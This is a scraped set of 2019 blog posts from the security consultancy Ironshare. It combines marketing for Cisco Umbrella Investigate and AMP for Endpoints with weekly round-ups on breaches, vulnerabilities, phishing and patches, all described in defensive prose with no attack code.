Companies today face huge challenges to detect, investigate and respond to security attacks, and it can be difficult to tackle incidents with limited staff. Once attackers have found a way in, they will work their way through your network to get to your sensitive data. Before launching an attack campaign, cyber criminals need to spin up servers, buy blocks of IP addresses, and register domains to host their malware. These activities provide digital 'fingerprints' which in-turn provide vital clues that can help resolve and prevent attacks.Cisco Umbrella Investigate gives you access to a live, up-to-date view of domains, IP addresses and malware file hashes – all of which can help to pinpoint attacker’s infrastructure and predict emerging threats. This information is commonly called ‘Threat intelligence’.The intelligence provided by Investigate is collected from ‘Cisco Talos’, the industry-leading threat intelligence group consisting of researchers, data scientists, and engineers. Talos underpins the entire Cisco security ecosystem and helps to deliver protection against attacks and malware.With Investigate, Ironshare analysts (or your own security analysts if you prefer) can quickly drill into the critical information required to understand an attacker’s infrastructure in minutes, where more traditional methods would take them hours or even days to complete.
Investigate delivers deep levels of information which highlight the relationships between key components of the attacker’s infrastructure: web sites, domains, IP addresses, networks (autonomous systems (ASNs) on the internet) and malicious files samples, through the use of unique file hashes.This information is all delivered through a single page view that can be drilled into, to unveil further related detail, as required. This view gives an ‘at a glance’ determination as to whether a domain, IP address or file is considered malicious or safe to use.Investigate analyses a huge amount of global internet data and malware, providing access to real time and historical information. This helps to:
To expand a little Investigate has the following capabilities and features:
Investigate can be used through two different methods:Web-based ConsoleThe web console gives real time access to all of the intelligence within Investigate and allows you to move through the different data during an investigation. As Investigate is integrated into Cisco Umbrella, you can either query matches through the Umbrella reports (which opens Investigate), or directly query using the dynamic search engine in the web console. Searches can be based upon exact matches for domains, IP addresses, file hashes etc. or can be pattern based for more flexibility to search on non-exact matches (terms, brand names etc.).The integration with Umbrella can help to turn the alerts and events in your logs, into usable intelligence quickly, with just a simple search.Application Programming InterfaceThe second method uses a RESTful API. API’s are simply pieces of software that allow communication between two different applications. The Investigate API allows you to bring the threat intelligence data into your other security systems to enhance your overall visibility. This includes systems such as Security Information and Event Management (ArcSight, Splunk etc.) as well other threat intelligence platforms.Using the search functionInvestigate is very easy to use, once logged into the Investigate console simply input a search string e.g. domain, URL, IP address or regular expression pattern.
Using Google.com as a quick example search we can see that the domain is deemed as safe, has a good score and is very popular, as expected.
Alternatively using a known bad domain, we see that Investigate has classed this as suspicious and placed it into the Umbrella Block List.
Digging further into the Investigate report, we see some of the reasons why. First of all, it shows the domain has a large number of associated malware samples with high threat scores.The Timeline section of the report provides an at a glance view of the current categorisation of the domain, along with changes to the category over time. It shows that this domain is currently part of a Command and Control botnet.
Umbrella and InvestigateAs described above the integration with Umbrella is a key point. The Activity search is a real-time log of traffic sent to Umbrella. From the Activity Search, we can launch Investigate on any malicious or blocked traffic for further analysis.
At Ironshare we aim to simplify the life of our customers in terms of IT Security. Together Ironshare and Cisco Umbrella Investigate can help organisations overcome common challenges such as:
In summary Investigate is a great tool in the arsenal of the security analyst. It provides a single correlated source of threat intelligence, that includes, WHOIS data, domain and IP reputation to determine what’s good and what’s bad, geographical location of IP addresses and domains, DNS request patterns and Malware File analysis.IronShare provide a fully managed service for Cisco Umbrella that includes Investigate, meaning all you need to do is tell us what you want to know about, and when. We’ll then tailor the service to your needs and deliver management reporting and recommendations as often as requested.Ironshare have full access to Investigate as part of the Managed Service, which we actively use to inform customers about related threats as applicable.Alternatively, if the Umbrella Platform package is preferred, Ironshare can provide your organisation with its own direct access to the Investigate console.Our service is applicable to companies of all shapes and size, meaning that even the smallest businesses can get a full enterprise service, and use our reports to easily identify problem PCs, or employee activity concerns.If you'd like to get more detailed information or pricing, please click here to Contact Us.
By
Stuart Hare
on
6/2/19
Google have released a new security update for their Android OS after it was disclosed that devices were vulnerable to a number of flaws that include three critical remote code execution vulns.The Android Security Bulletin for Feb 2019 includes a total of 42 CVE’s; 11 vulns were classed as Critical, 30 High, and 1 moderate, spanning Framework, System, Kernel, NVIDIA graphics, and Qualcomm network components.Google consider the three PNG based critical flaws to be the most severe included in this month’s bulletin, which impacts millions of devices worldwide running Android v7.0 to v9. A PNG is a common type of image file format similar to bitmap (BMP) and JPEG.These three critical vulns are identified as CVE-2019-1986, CVE-2019-1987 & CVE-2019-1988, exist due to the way that the Android OS handles PNG files. By sending a specially crafted PNG image file, a malicious actor can execute code remotely on the target device with privileged access.This can be exploited by sending the malicious image via email or messaging app and is executed by the user simply open and viewing the image, resulting in device hijack and compromise.It is understood that to date Google have had no reports of this vuln being exploited in the wild.It is advised that all Android devices be updated with the latest security patch levels 2019-02-01 & 2019-02-05 ASAP, to fix the issues contained in this advisory. As Android is a multiple platform open source OS, an available update for your device may depend on a release from your specific manufacturer.To check a device's security patch level, please see Check and update your Android version.
To keep up to date with our news and posts why not join our mailing list by using the link to subscribe: http://bit.ly/IronMailListIronshare – Security Simplified
By
Stuart Hare
on
6/2/19
Motherboard have reported how the UK’s Metro Bank has fell victim to a two-factor authentication (2FA) attack that exploits the legacy Signalling System 7 (SS7) protocol, to intercept 2FA codes.The SS7 protocol was originally developed in 1975, and in 1980 the ITU formerly approved it as the international standard for telephone signalling, call establishment and routing.Flaws in SS7 are known to have been exploited for quite some, and successful attacks against the protocol are capable of tracking phones, as well as intercepting calls and text messages.It has previously been believed that the ability to exploit SS7 has been firmly in the hands of intelligence agencies, but Motherboard confirmed that this is far more wide spread. Cyber criminals are using this to attack bank customers with the aim of clearing out their bank accounts.Although cases are still pretty rare, these types of attacks are being seen globally, and Metro Bank have confirmed that a small number of their customers have been a victim of such an attack which resulted in financial fraud and stolen funds.“At Metro Bank we take our customers’ security extremely seriously and have a comprehensive range of safeguards in place to help protect them against fraud. We have supported telecommunication companies and law enforcement authorities with an industry-wide investigation and understand that steps have been taken to resolve the issue,” a Metro Bank spokesperson told Motherboard in an email.“Of those customers impacted by this type of fraud, an extremely small number have been Metro Bank customers, and none have been left out of pocket as a result. Customers should continue to remain vigilant and report any suspicious activity using the number on the back of their card or on our website,”The fundamental flaw stems from the lack of authentication in SS7, that does not require a sender to prove who they are to successfully send a message. This results in malicious parties being able to reroute messages across the network.The UKs National Cyber Security Centre are actively working to help secure the SS7 protocol to prevent abuse of the UK mobile telephone networks and tackle SMS spoofing, but the harsh reality is that the telco industry has been ignoring these exploitable gaps in the worlds telecom infrastructure for too long.That said, these are sophisticated and targeted attacks. A 2FA code on its own is not enough for an attacker to access a victims account, so they must use other methods to first gain access to the customers username and passwords. This is typically achieved using phishing attacks that make use of fake emails and/or websites to capture the user’s information.As a user or customer your best method of protecting yourself against these threats is to remain vigilant when it comes to fake emails and phishing websites. Never click on email links from people you don’t know or trust and look out for suspicious email and website addresses that don’t match those of your bank.If you are a Metro Bank customer and feel that you may have been victim of Fraud you can use their website for guidance which includes a link to report your concerns.https://www.metrobankonline.co.uk/ways-to-bank/i-want-some-information-about/fraud-and-security/
To keep up to date with our news and posts why not join our mailing list by using the link to subscribe: http://bit.ly/IronMailListIronshare – Security Simplified
By
Stuart Hare
on
5/2/19
The European Commission has ordered the child smart watch provider ENOX to recall its Safe-KID-One product, after it was found the watch could be used by bad actors to send messages to the watch and use the inbuilt GPS to find the locations of their child users.The Commissions rapid alert system, which is used to inform other European nations of dangerous products, states that these smart watches pose a ‘serious’ risk; potentially threatening the child’s safety.
The Safe-KID-One is badged as ‘A High Tech SIM/GPS Safety and Surveillance Smart Watch for Kids’ by its manufacturer and has the tag line of ‘You can Keep an Eye on, Talk to and Watch over your Kid Everywhere and All the Time’. It includes a built-in microphone, speaker and GPS locator, and supports a smart phone companion app for parents to use and keep tabs of their children.The risk highlighted by the EC, states that a malicious user is able to send commands to any watch, and make it call any number of their choosing, allowing communication directly with the child wearer, as well as the ability to pinpoint the child’s location through GPS.This is primarily related to the unencrypted communication used by the devices to communicate with the ENOX servers, which enables unauthenticated access to its data. This results in access to the device data, location history, phone numbers and serial number, which can be easily captured or modified.In EC terms, this product does not comply with the requirements of the Radio Equipment Directive.It is reported that this may be the first time that the Rapid Alert System (RAPEX) has been used to report a dangerous product based on its risk to privacy and data protection.ENOX contacted The Register and told them: "This Version of the Watch was tested by Bundenetzagentur in Germany last Summer, and it did pass the test and was released for sale. In December 2018 we got the attached confirmation from them, that the watch had passed their test.This is not the first time that children’s smart watches have been in the news, in November ‘18 Pen Test Partners reported a similar issue in the MiSafes smart watch.In the interests of child safety, we recommend that parents no longer allow their children to use these devices, until a time the vendor can prove they have resolved these issues.
To keep up to date with our news and posts why not join our mailing list by using the link to subscribe: http://bit.ly/IronMailListIronshare – Security Simplified
By
Stuart Hare
on
5/2/19
Endpoint protection is a regular topic for discussion and is a key component in a Defence in Depth strategy. Since the introduction of Cisco AMP for Endpoints, there have been many questions regarding where AMP sits in comparison to Endpoint Protection from other vendors and how it should be used.Common questions have included:
The answer to all these questions is Yes, but there are some key points to understand.In our previous post ‘What is Cisco AMP for Endpoints?’, we explained that AMP is Cisco’s Next Generation Endpoint Protection solution, that uses advanced techniques and dynamic file behaviour analysis to detect the presence or installation of malicious software, to enable rapid response, and prevent or remove an infection.Here we will cover some of these common questions.
AMP for Endpoints was specifically designed to work together with existing Anti-virus solutions such as McAfee and Symantec. AMP does not clash with existing AV products nor does it try to compete with them.Instead AMP allows the AV software to perform its inspection and analysis first, and if the AV detects malware it can perform its configured quarantine or removal actions as required, and AMP does not need to get involved. In the event that the AV does not detect the presence of malware, AMP then steps in to perform its analysis and blocking as required.
A signature is a static string or pattern of text that uniquely identifies a virus. These signatures allow Anti-virus software to detect and trigger alerts when a virus is present. As these are static identifiers, the virus needs to be known and understood, if the virus behaviour changes or a new virus is released then new signatures will be required. This can lead to gaps in your endpoint security.These Anti-virus products are often referred to as ‘Point-in-time detection’ technologies.In addition to the cloud based dynamic file analysis, AMP for endpoints includes Point-in-time offline protection engines for Anti-virus scanning. Two offline protection engines are currently available with AMP:
These offline protection engines are not enabled by default, but they can be enabled in the policy as required. If you decide to run AMP alongside existing AV software, then these offline engines should not be enabled.Both engines run offline copies of the signature files locally on the endpoint and must connect to the AMP cloud regularly to download the latest signatures, in the same way that standard Anti-virus products do.
In short, you can use AMP to replace your existing AV product. Cisco AMP for Endpoints goes beyond these normal signature-based detection and prevention technologies, by including multiple engines to enhance AMPs ability to detect Malware.AMP for Endpoints provides deep visibility and control using the following:
Cisco have many clients that have used AMP for Endpoints to replace their existing Anti-virus software.Ultimately though, the decision is yours. You need to consider whether AMP for Endpoints is suitable to replace your current AV. This may depend on several factors; your organisations security policy; the capabilities of your current endpoint protection software and whether you feel it is performing to your standards, and your organisations requirements for endpoint security; to name a few.
Cisco’s AMP for Endpoints does not aim to mimic the standard Anti-virus and Endpoint Protection products, that most people are familiar with today. As discussed above AMP is a Next Generation Endpoint Security solution, which uses advanced methods to detect attacks and malware infections that occur on your PC’s, Laptops, Servers etc.Below are a few items available in typical Endpoint Security products that Cisco AMP for Endpoints does not provide:
To cover the above items, you could use AMP in conjunction with alternative layers of security such as network-based controls or integrated software such as Windows Defender, which is built into Microsoft operating systems.
Cisco AMP for Endpoints is a simple, strong and effective solution in the fight against Malware and modern day cyber-attacks. It can be used in conjunction with, or as an alternative to, your existing Endpoint protection solution - depending upon your requirements.AMP does not have to operate as a standalone product, it is part of larger security architecture that is integrated with numerous products in the Cisco Security portfolio. These products are built to work together as an integrated security system, to provide faster detection and response to threats across your organisation and close the gaps that come from using different individual security products that are unaware of each other.
Ironshare can help you to get up and running with Cisco AMP for Endpoints within days.We not only provide step-by-step guidance on deployment within your organisation, we can also manage the day-to-day running and reporting, leaving your teams to get on with their usual day job.Our aim is to provide Security, Simplified. That means we can communicate in a non-technical manner (or technical if you prefer) and just give you the information you want.Step 1 – Simple PricingIronshare are Certified Cisco partners who specialise in security and operate in a completely transparent manner. Unlike other providers we make no secret of our pricing and you can simply click here to get an accurate price estimate. No nonsense – simple!
Step 2 – Simple DeploymentCisco AMP for Endpoints requires no on-site hardware and can be deployed very easily, providing advanced protection for all of your endpoints.Our technical team would need to speak with your software deployment teams but rolling out the lightweight connector is straightforward. There might be other factors to consider for wider deployments – but none will be complicated and even the largest of companies can have this up and running very quickly.We will guide you through the entire process. No hidden costs – simple!Step 3 – Simple ManagementAlthough AMP for Endpoints has a great management interface, it does take time to get up to speed with the product, so to manage this yourself would require some dedicated resource to first of all learn, but then maintain and get the best out of AMP for Endpoints.Our team at Ironshare are experienced with the product, and we would talk to you about what you want to achieve, and after the initial setup we will deliver you a managed service that ensures your IT support or security team are aware of threats from day one. With an Ironshare managed service your team have more time to get on with their normal day to day activities.In addition, we’ll alert you to any malware issues that the product discovers and provide you with a monthly report that summarises all of the interesting facts and figures. We’ll also give you recommendations on internal actions you might need to take.ConclusionIronshare are a small, niche security consultancy focused on delivery of fast and efficient solutions to businesses. Our experienced team aim to provide a fully managed service that takes the strain away from your employees and allows you to focus on your core business.Ironshare – Security, SimplifiedIf you have any questions – please Contact Us here.
By
Stuart Hare
on
3/2/19
Welcome to the Ironshare Cyber Round-up where we look back at the events of that last week and handpick some of the news, posts, views, and highlights from the world of Security.
In this week’s round-up:
The commercial aircraft giant Airbus have issued a statement on their website regarding a Cyber Security incident that resulted in unauthorised access to their systems and data.
As only limited information is available about the incident, how much data has been exposed, and the impact to employees or its customers, is not yet understood. Although, in their statement, Airbus report that the incident had no impact to its commercial operations.
“Investigations are ongoing to understand if any specific data was targeted, however we do know some personal data was accessed. This is mostly professional contact and IT identification details of some Airbus employees in Europe.”
This appears to be another sign that companies of all sizes are not doing enough to secure their systems and data. Hackers are finding it too easy to identify vulnerable internet connected systems that can be exploited and compromised.
Companies need to ensure they have several layers of security in place that can protect the organisation and maintain strong levels of data privacy. Perimeter firewalls and gateways combined with standard anti-virus products is no longer enough to defend against modern advanced threats.
Kwik Fit, one of the big names in the UK for vehicle tyres, MOT and servicing, were hit by a computer virus that halted their online operations for a period and resulted in significant impact to its customers for most of this week.
In conversation with the BBC a Kwik Fit spokeswomen confirmed that they had experienced issues with their IT systems, which was the result of a computer virus infection, and that their IT team were busy trying to get their systems back up and running.
"This [issue] affected a number of our systems but in the interest of ongoing security we can't confirm the source of the problem. We have been working to get our operational systems back up and running normally and while there is still some disruption, our centres are open as usual."
To date Kwik Fit have not issued a press release regarding this issue but have been communicating with their unhappy clients via social media. In a statement they claim that they do not store any financial information, and at this time have no reason to believe that any customer data has been compromised.
Although not confirmed, due to the time taken to recover from the incident it is likely that this could be the result of a ransomware attack.
Unfortunately, the amount of cancelled appointments and unhappy customers has not only hit Kwik Fit financially but has also had a huge impact on customer trust and the overall reputation of the business. Recovery from a cyber attack can take weeks and even months, but reputational damage caused can take years to repair.
Don’t take risks with your business reputation, bolster your cyber defences before disaster strikes.
Google and Facebook and have been repeatedly in the news recently regarding their lax approach to data privacy, and this week has been no different. With very few opponents capable of punishing these two internet giants, Apple took on the task to lay down the law after both firms managed to breach their developer agreements.
Facebook were hit hard first, when Apple found that they had been using special developer certificates for internal applications to distribute their tracking ‘Research App’ to teenage customers. These certificates are meant for the Apple enterprise program and give the software developer the ability to install powerful apps on iOS devices for use by company employees only.
A block on Google then swiftly followed, after their ‘Screenwise Meter App’, designed to monitor how people use their iPhones, was also found to be using an AEP developer certificate.
Apple’s revocation of these certificates has significant impact on the firms, which not only prevents the apps from being distributed to devices but also stops them from working altogether. To compound the issue a single certificate can be used with all the internal apps for an organisation, not just one.
Facebook confirmed that all their apps were impacted by this action. Unlike Facebook, who have had a few disputes with Apple around privacy concerns, Google had the benefit of working more closely with them to resolve the issues quickly.
Other companies such as Amazon and Sonos, may also be added to this list soon as it is believed that they too are issuing beta apps to non-employees. With Apples renewed hard line on privacy and agreement violations, other vendors should learn from the example made here.
In the last couple of days both Facebook and Google have confirmed that their certificates and internal app access has been restored.
A poll conducted by FICO has found that the majority of banking consumers in the UK, felt that there were already too many security checks involved in banking and cards payments and that adding additional security checks such as 2FA (two factor authentication) are not necessary.
The poll which covered 500 consumers from UK, Germany, Spain and Sweden, was conducted to gauge the attitudes towards the new PSD2 European banking regulations, which requires banks and payments services to enforce stronger authentication.
Consumers were concerned that these additional measures would bring more complexity to the process, it could be impacted by poor mobile coverage, while others would not trust banks with their mobile number.
Although 2FA is not fool proof, it does add another layer of security to the authentication process. Concerns over SMS based 2FA have been well covered in recent times, but although app based 2FA should always be the preferred option, it remains that SMS based 2FA is far better than simple user name and password authentication.
We at Ironshare have heard many arguments against 2FA and its added process and complexity, but we see this as simply another culture shift in the use of new technology. Typically, it only takes a few additional seconds to enter a 2FA code, and users tend to adapt quite quickly to its use which soon becomes second nature.
We recommend that you embrace the use of 2FA wherever possible, as it could be the difference in your fight against identity theft and financial fraud.
Source: https://www.infosecurity-magazine.com/news/uk-consumers-not-happy-with-psd2/
And that’s it for this week, please don’t forget to tune in for our next instalment.
Ironshare – Security Simplified
Edition #27 – 1st February 2019
By
Stuart Hare
on
1/2/19
Welcome to the Ironshare Cyber Round-up where we look back at the events of that last week and handpick some of the news, posts, views, and highlights from the world of Security.In this week’s round-up:
The Mercury News have reported how a family in the US were subjected to 5 minutes of terror after their NEST home surveillance camera was accessed by hackers and used to broadcast a North Korean Missile Strike warning via its built-in speakers.The detailed broadcast message warned that missiles were heading to Chicago, Ohio and Los Angeles, that people in these areas had 3 hours to evacuate, and that the United States had retaliated against North Korea. In an interview the family stated:
“It sounded completely legit, and it was loud and got our attention right off the bat. … It was five minutes of sheer terror and another 30 minutes trying to figure out what was going on.”
Calls were made to the emergency services and to NEST, before the warning was finally deemed a hoax, and that the incident was probably the result of a hack. Surprisingly, prior to the incident the family were completely unaware that their NEST camera had speakers installed.This is not the first time NEST have been in the news for remote hacking of their cameras, only last month we were hearing about a polite security conscious hacker who instructed the owner via a compromised camera, how to improve his security.These incidents highlight the ever-growing risks associated with IOT Smart devices and connecting them directly to your home and business networks without thinking about security. These hacks are typically the result of poor password practice by the users.Reuse of passwords for multiple online services that then appear in data breaches, is a sure-fire method of hackers gaining access to your devices. In addition to this a simple compromise of an IOT device could lead to further or even complete compromise of all devices on your network.To help protect against these attacks, users should ensure that you never use the same password more than once; if available, enable two factor authentication (sometimes called two step verification); and if possible create a new sub-network in your home or office to separate these IOT devices from computers you deem more critical (PCs, laptops, servers etc.).
Phishing attacks have been around for quite some time and detecting them is not getting any easier. With the scammers trying new tricks and making the emails and websites more like the real thing, even hardened security professionals that deal with analysing phishing threats, can have a hard time detecting a real email from a scam. If this is hard for InfoSec professionals then just imagine how hard it is for the general public and business users.Education and awareness into what a phishing threat looks like, and the general steps you can take to identify them is a key step to protecting yourself or your business from attack.There are lots of options available that businesses can use to educate their users (such as PhishMe and KnowBe4) but now Google and their Jigsaw unit have developed a short quiz that is available to everyone, so you can see how good you are at spotting what’s real and what’s fake.
The quiz is available online at phishingquiz.withgoogle.com, why not have a go and test your phishing detection skills. It’s simple but clever interface gives classic examples and shows you the common things to check and look out for.It’s starts by asking for name and email address, but there is no need to enter any real information about yourself, entering fake details here is just fine. I have taken this myself and managed to get 6 out of 8 questions correct, and hopefully by giving this a try you will see that spotting a phish is hard.Generally phishing starts by trying to hook a potential victim into clicking on a malicious link or attachment contained in an email. Once the victim has taken the bait, phishing websites are used to capture their usernames, passwords and personal information, which can then be used by the malicious actors for identity theft, fraud and account compromise.As a final note, please remember that security education and awareness is a great tool, that’s a must when trying to combat the threat of phishing and other cyber attacks, but alone it will never be a complete solution or mythical silver bullet. Combining education with good practice, process and technology is what’s required to create a more robust security posture.
Tuesday saw the release of multiple security updates for vulnerabilities across Apples iPhone, iPad, Mac, TV and Watch products. The highlights in these updates, address critical vulnerabilities that exist in iOS and macOS operating systems.iOS 12.1.3 has been released to resolve a number of privilege escalation and remote code execution issues with iPhones and iPads. Buffer Overflow / memory bounds flaws in the devices Bluetooth implementation (CVE-2019-6200) and FaceTime app (CVE-2019-6230) can allow an attacker to execute remote code on the affected devices. While the update to CVE-2019-6206 covers a flaw in the password autofill feature that allows the password to still be filled after they have been manually cleared.On the macOS front, Mojave, Sierra and High Sierra updates are available to address several vulns. Flaws in the Intel graphics driver (CVE-2018-4452) have been addressed that would allow a malicious application with system privileges to execute code; while memory corruption issues in the sandbox process (CVE-2019-6235) and hypervisor (CVE-2018-4467) could result in the bypassing of sandbox restrictions and the elevation of privileges.Staying up to date with the latest security patches goes a long way when defending against online threats, so please update your devices as soon as you can.Notes for all January updates can be found here.
The APT package manager aka apt-get, a well-known software update and removal utility in Linux distributions (such as Ubuntu and Debian), has been in the news this week, due to a critical vuln, that could allow a malicious actor to launch a man-in-the-middle attack and execute remote code.In his post, researcher Max Justicz explains that due to the use of clear text HTTP in the update process, and inadequate checks of HTTP redirects, a hacker can manipulate the response to redirect to another mirror site and install malicious packages with root privileges.This is a technical post but explains in depth how he was able to exploit this vulnerability. Max, and many others believe that if apt used HTTPS communication by default for its update process, the man-in-the-middle attack would not have been possible.This topic has resulted in many debates, with a lot of people thinking HTTPS is pointless during the update process and that focus on signing the packages (with digital certificates) is more important. This was evident this week as those against HTTPS took to twitter to defend HTTP and its benefits when used for updates, stating that HTTPS added a level of complexity, hampers performance and makes it difficult to cache content using multiple mirrors (repositories).Ubuntu and Debian Linux have issued patches for this vuln and security notices can be found at the below links. It is recommended that you update your servers ASAP to prevent this threat. If you have concerns about performing the update, Max’s post above gives details on how you can disable redirects during the update process.Ubuntu Security Notice: https://usn.ubuntu.com/3863-2/Debian Security Notice: https://www.debian.org/security/2019/dsa-4371And that’s it for this week, please don’t forget to tune in for our next instalment.
To keep up to date with our news and posts why not join our mailing list by using the link to subscribe: http://bit.ly/IronMailListYou can also follow us using the social media links provided.If your business needs to improve its security, kick-start your Cyber plans with our Free Cyber Assessment: http://bit.ly/IronFreeCyberReviewIronshare – Security SimplifiedEdition #26 – 25th January 2019
By
Stuart Hare
on
24/1/19
Welcome to the Ironshare Cyber Round-up where we look back at the events of that last week and handpick some of the news, posts, views, and highlights from the world of Security.In this week’s round-up:
Fortnite, the mega popular last man standing online game by Epic Games, has been in the news this week for another vulnerability, this time allowing hackers to gain unauthorised access to user’s accounts without their login details.In a blog post by Checkpoint, researchers discovered that flaws in the Epic Games account login page, could be exploited by attackers, to perform a malicious redirection to an attacker controlled Epic Games sub-domain, allowing them to capture the authentication token required to access a user’s account.Checkpoint identified that the sub-domain ‘ut2004stats.epicgames.com’, a legacy service used by the classic game Unreal Tournament, was vulnerable to old school Cross Site Scripting (XSS) and SQL injection attacks. By exploiting these vulnerabilities, Checkpoint planted a JavaScript on the ut2004stats server, which was responsible for resending and capturing token requests.This was tested using Fortnite’s Facebook login, but it is understood that any of the authentication providers (Google, PlayStation, X-Box etc.) would have been impacted too.By simply sending a message to a user that contains a link promising free game credits (v-bucks), victims are enticed to click the link which results in the authentication token being captured, without the need for login details to be entered.Once captured the attacker will have full access to the users account and all the personal information contained within it. This includes the ability to make huge in game purchases using the credit card information attached to the account. By gifting these purchases to another hacker-controlled account they can be sold on to other users to make real world cash, thus helping to fund further cyber criminals activities.Checkpoint have confirmed that they disclosed the vulns to Epic Games prior to going public, and they have since patched and resolved all issues.We recommend:
For a more technical breakdown of the attack please the Checkpoint Research Site.
It’s not even February yet, and we are already seeing Valentines cards in the local shops and Love letter Malspam in our email. A huge malware spam campaign dubbed ‘Love Letter’ has been found in the wild and is delivering more than just the usual romantic terms of endearment.The Love Letter campaign sends out romantically titled emails containing malicious ZIP file attachments, which when opened includes a JavaScript file that infects the victim’s machine with not so loving malware. Distributed by this campaign is malware such as GandCrab ransomware and XMRig crypto coin miners.On top of these infections, researchers also found that an infected host became a node in the Phorpiex Spambot, which is then used to increase the spread of this malspam campaign.Look out for emails that are sent from the following addresses or contain the following subjects and never open attachments from unknown or untrusted sources.
A technical breakdown can be found on the SANS ISC Diary pages.
Troy Hunt’s Have I Been Pwnd Service has been hard at work this week, informing users that have been impacted by the latest data breach, Collection #1.Collection #1 is being used as a credential stuffing list, which basically means it contains a huge amount of email address and password data that has been collected from multiple different data breaches, that hackers can then use to automatically try and break into user’s accounts.Troy reports that this is the single largest breach he has loaded into HIBP. In terms of numbers it includes a total of 2.69 billion credentials; 1.16 billion unique combinations of email address and password; nearly 773 million unique email addresses and 21 million unique passwords.Importantly Collection #1 contains approximately 140 million new email addresses not previously listed in HIBP.To find out if your details are included in the Collection #1 breach, access haveibeenpwned.com and enter your email address.Attackers use Credential stuffing lists to prey on the fact that victims will have reused their email addresses and passwords on multiple sites, so stay safe by adopting password best practices. Use unique complex passwords every time and do not reuse the same password twice.If remembering your passwords is becoming a challenge, then give a password manager a try, there are a few to choose from, such as 1Password or LastPass.
Small to Medium business and home office users running TP-Link VPN Router devices, are recommended to update their device firmware, after multiple vulnerabilities were disclosed to the manufacturer by Cisco Talos.These vulns, which include critical remote code execution and denial of service flaws, specifically affect the TP-Link TL-R600VPN gigabit broadband VPN Router product, using firmware versions 1.2.3 and 1.3.0.It is the HTTP server component of the router that is vulnerable to exploit. This allows malicious actors to crash the device HTTP server, as well as running malicious code on the router, that not only compromises the device, but can also lead to further network and data compromise. We have seen evidence of this in the last year with the VPNFilter malware that infected over 500,000 devices worldwide.Keeping up with the latest security patches is critical for businesses large and small, to defend against cyber threats, and while businesses may ensure that PCs and Servers are updated regularly, devices such as internet routers, network switches and IOT devices, are often forgotten about. Make sure that you include these types of devices when reviewing and deploying your regular updates.For a deep dive breakdown of the vulnerabilities mentioned here see the blog post on talosintelligence.com.
To close out this weeks round-up we just want to remind readers of the increased level of tax scams and phishing campaigns that are in circulation at the moment. We are in the middle of the Self-Assessment peak for HMRC where all UK tax payers are required to submit and pay their tax self-assessments by January 31st, which makes it a prime time for criminals to benefit from their scams.These scams generally come in the form of genuine looking phishing emails, but more commonly we are seeing cold calling used as the delivery method. The aim of these scams is to steal your personal information and identity but can also lead to stealing money from your bank accounts.Below is a typical example of a tax refund scam email we have dealt with this week.
Some key things to look out for:
For guidance on how to recognise real HMRC contact please see the official website.As always, remain aware and stay safe online.And that’s it for this week, please don’t forget to tune in for our next instalment.
To keep up to date with our news and posts why not join our mailing list by using the link to subscribe: http://bit.ly/IronMailListYou can also follow us using the social media links provided.If your business needs to improve its security, kick-start your Cyber plans with our Free Cyber Assessment: http://bit.ly/IronFreeCyberReviewIronshare – Security SimplifiedEdition #25 – 18th January 2019
By
Stuart Hare
on
18/1/19
Welcome to the Ironshare Cyber Round-up where we look back at the events of that last week and handpick some of the news, posts, views, and highlights from the world of Security.In this week’s round-up:
Everyone these days seems to be on the lookout for bargains, and the internet has become a great tool for quickly hunting down the best prices for your next big purchase. Cheap illegal software has been available on the internet now for many years, but what about the ultimate bargain for legit licensed software.This week a KrebsonSecurity report has covered the findings of licensed Microsoft Office Professional software, that is being sold online for an unbelievably low cost of under $4.00 (£3.14). The eBay seller is advertising the instant email delivery of a Microsoft Office 365 subscription for 5 users which typically retails at £79.99 per year.“Too good to be true” you say, “there must be a catch?” and of course there is. Although the software subscription is legit, the eBay merchant is actually reselling the accounts for existing Office 365 subscriptions. Once the purchase is completed the merchant will email the buyer with someone else’s username and password account details. What's more, you can never change these details to your own email or password as the account is locked down. At this point if the low cost hasn’t raised a red flag for you, hopefully this will.Where the security issues really kick in is with the OneDrive file storage included with the subscription. To ensure you have access to your documents from anywhere, Office 365 provides cloud-based file storage called OneDrive, which Office will prompt you to sync and save all your documents to. By doing so, anyone that purchases this subscription and uploads their documents to this OneDrive account, is basically giving the merchant administrator full access to all of their OneDrive documents. And depending on the information contained this could result in a data breach, data theft, fraud or identity theft.As you can see the low initial cost comes at a very big price. When looking for your next software purchase, always buy from a reputable trusted source, to ensure that you and your information stay safe and secure.
In this month’s Patch Tuesday Microsoft has disclosed a total of 49 vulnerabilities in its products, which includes 7 that are rated Critical and 40 rated Important.The MS Edge based Chakra scripting engine appears again this month, with 3 critical memory corruption vulns that could allow code to be executed under the context of the current user. This is achieved by getting a user to visit a specially crafted website that manipulates the objects in memory.Windows Hyper-V, Microsoft’s Virtual Machine hypervisor, includes 2 critical remote code execution vulns. By failing to properly validate input from the guest Operating System, an attacker can run a crafted application on the guest machines to execute code on the host server. This affects Windows 10 and Windows Server operating systems.The Windows DHCP client responsible for automatically assigning IP addresses to a system, contains a critical code execution vulnerability. This vuln can be exploited by an attacker by sending crafted responses to the DHCP client. This affects Windows 10 and Windows Server operating systems.The final critical vuln this month exists in the MS Edge browser and how it fails to handle memory objects properly. Like the Chakra vuln above this can be exploited when the user visits a specially crafted website.Staying up to date with security patches for your operating systems and software, is a critical part of delivering and maintaining a strong security posture, please ensure you test and update as quickly as possible to prevent exploitation and stay secure.The January Patch Tuesday release notes can be found here while the Security Guidance and CVEs can be found here.
Have you ever come across a RansomPhish attack? No? Well unsurprisingly, before this week neither had we. As you might guess from our poor excuse of a name, the MalwareHunterTeam reported on Wednesday that they had discovered a new variant of Ransomware (believed to be HiddenTear) that not only infects your system and encrypts files but also includes a Paypal Phishing attack in the ransom note.The ransom note displays the usual warning message that your files have been encrypted and explains that $40 in bitcoin must be paid to get access to your files. A bitcoin wallet ID and a Paypal Buy Now button is included at the end of the note.Victims who click on the Buy Now button get immediately sent to a Paypal like account screen (no login required) which reports your account access is limited. Your credit card and personal information is then requested to restore your account. Once the victim has handed over all their juicy information to the attacker, they are then told the account is fully restored and they will be redirected to their account.This is a big double hit for potential victims who not only face the traumatic events of a Ransomware attack but will also need to deal with the identity theft and financial fraud attacks that follow.Fortunately for the victims of this ransomware there is a free decryption tool available from @demonslay335, so please do not pay the ransom.With these types of attacks, we recommend the following:
